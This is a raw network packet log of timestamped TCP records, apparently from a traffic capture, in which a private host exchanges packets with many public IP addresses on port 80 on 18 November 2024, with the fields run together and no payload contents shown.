                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.402548075 CET5006180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.407888889 CET805006154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.407948017 CET5006180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.417326927 CET5006380192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.422318935 CET805006335.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.422373056 CET5006380192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.422815084 CET5006380192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.422975063 CET5006380192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.427634954 CET805006335.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.427768946 CET805006335.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.267492056 CET805006335.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.267667055 CET5006380192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.273494959 CET805006335.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.274197102 CET5006380192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.420805931 CET805006247.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.422631025 CET5006280192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.428895950 CET805006247.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.429582119 CET5006280192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.736315012 CET5006480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.741159916 CET805006434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.741225958 CET5006480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.744335890 CET5006480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.744358063 CET5006480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.749284983 CET805006434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.749303102 CET805006434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.570540905 CET805006434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.570780993 CET5006480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.575999975 CET805006434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.576092005 CET5006480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.757652044 CET8050027165.160.13.20192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.757719994 CET5002780192.168.2.7165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.757807016 CET5002780192.168.2.7165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.762602091 CET8050027165.160.13.20192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.969805002 CET5006580192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.974728107 CET80500653.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.974847078 CET5006580192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.975764990 CET5006580192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.975799084 CET5006580192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.980648994 CET80500653.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.980662107 CET80500653.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.029170036 CET5006680192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.034162998 CET805006647.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.034245968 CET5006680192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.034554005 CET5006680192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.034605026 CET5006680192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.039464951 CET805006647.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.039493084 CET805006647.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.636013985 CET80500653.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.636199951 CET5006580192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.641649961 CET80500653.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.641875982 CET5006580192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.649766922 CET5006780192.168.2.7165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.654793978 CET8050067165.160.13.20192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.654865026 CET5006780192.168.2.7165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.657634020 CET5006780192.168.2.7165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.657668114 CET5006780192.168.2.7165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.662621975 CET8050067165.160.13.20192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.662638903 CET8050067165.160.13.20192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.343055964 CET8050067165.160.13.20192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.350097895 CET5006780192.168.2.7165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.350121021 CET5006780192.168.2.7165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.356703043 CET8050067165.160.13.20192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.356733084 CET8050067165.160.13.20192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.513679981 CET805006647.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.514126062 CET5006680192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.519237995 CET805006647.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.519917965 CET5006680192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.525129080 CET8050067165.160.13.20192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.540438890 CET5006880192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.545341015 CET805006854.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.547694921 CET5006880192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.547789097 CET5006880192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.547789097 CET5006880192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.552573919 CET805006854.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.552587032 CET805006854.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.567341089 CET5006780192.168.2.7165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.083091021 CET5006980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.088143110 CET805006918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.088218927 CET5006980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.088618040 CET5006980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.088685989 CET5006980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.093483925 CET805006918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.093504906 CET805006918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.386568069 CET805006854.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.387214899 CET5006880192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.392872095 CET805006854.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.394958973 CET5006880192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.399554014 CET5005680192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.399584055 CET5005680192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.404720068 CET8050056208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.404736996 CET8050056208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.545331001 CET8050056208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.549509048 CET5005680192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.549509048 CET5005680192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.554404974 CET8050056208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.554421902 CET8050056208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.694561958 CET8050056208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.705986977 CET5007080192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.710892916 CET805007034.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.710999966 CET5007080192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.711086988 CET5007080192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.711086988 CET5007080192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.715989113 CET805007034.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.716056108 CET805007034.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.739243984 CET5005680192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.766616106 CET805006918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.766810894 CET5006980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.772092104 CET805006918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.772146940 CET5006980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.182128906 CET5007180192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.187041998 CET805007113.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.187249899 CET5007180192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.187603951 CET5007180192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.187663078 CET5007180192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.192414999 CET805007113.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.192465067 CET805007113.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.543222904 CET805007034.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.543396950 CET5007080192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.549348116 CET805007034.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.549398899 CET5007080192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.579353094 CET5007280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.584316969 CET805007254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.584372044 CET5007280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.584867954 CET5007280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.584867954 CET5007280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.589634895 CET805007254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.589826107 CET805007254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.416261911 CET805007254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.416424990 CET5007280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.422472954 CET805007254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.422569036 CET5007280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.430177927 CET5007380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.435065031 CET805007318.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.435157061 CET5007380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.435285091 CET5007380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.435323954 CET5007380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.440776110 CET805007318.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.441250086 CET805007318.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.628956079 CET805007113.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.629156113 CET5007180192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.634450912 CET805007113.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.636790037 CET5007180192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.203851938 CET5007480192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.209764957 CET805007434.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.209861040 CET5007480192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.233120918 CET5007480192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.233120918 CET5007480192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.238071918 CET805007434.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.238089085 CET805007434.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.723906994 CET5007480192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.756127119 CET5007580192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.761176109 CET805007534.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.761267900 CET5007580192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.761553049 CET5007580192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.761553049 CET5007580192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.766453028 CET805007534.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.766479969 CET805007534.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.890146017 CET805007318.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.890296936 CET5007380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.896688938 CET805007318.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.896755934 CET5007380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.903183937 CET5007680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.908088923 CET805007618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.908179045 CET5007680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.908274889 CET5007680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.908292055 CET5007680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.913110018 CET805007618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.913121939 CET805007618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.584336996 CET805007618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.589340925 CET5007680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.594877005 CET805007618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.595618010 CET5007680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.614629984 CET5007780192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.619477034 CET805007744.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.621572018 CET5007780192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.634391069 CET5007780192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.634407043 CET5007780192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.639302015 CET805007744.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.639322996 CET805007744.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.722635031 CET805007534.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.722820997 CET5007580192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.728267908 CET805007534.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.729100943 CET5007580192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.854973078 CET805005985.214.228.140192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.857620001 CET5005980192.168.2.785.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.857702017 CET5005980192.168.2.785.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.862493038 CET805005985.214.228.140192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.044101954 CET5007880192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.049034119 CET805007818.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.049280882 CET5007880192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.053622007 CET5007880192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.053622007 CET5007880192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.058557034 CET805007818.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.058573961 CET805007818.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.276596069 CET805007744.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.277654886 CET5007780192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.284120083 CET805007744.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.285685062 CET5007780192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.314656019 CET5007980192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.322808981 CET805007918.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.322947025 CET5007980192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.323323965 CET5007980192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.323367119 CET5007980192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.328445911 CET805007918.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.328465939 CET805007918.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.516810894 CET805007818.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.517672062 CET5007880192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.522905111 CET805007818.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.525548935 CET5007880192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.780033112 CET805007918.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.780289888 CET5007980192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.785418987 CET805007918.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.785547972 CET5007980192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.799371004 CET5008080192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.804233074 CET805008018.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.804291964 CET5008080192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.808743954 CET5008080192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.808768034 CET5008080192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.810502052 CET5008180192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.813534021 CET805008018.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.813601971 CET805008018.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.815344095 CET805008113.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.817604065 CET5008180192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.817739010 CET5008180192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.817814112 CET5008180192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.822637081 CET805008113.251.16.150192.168.2.7
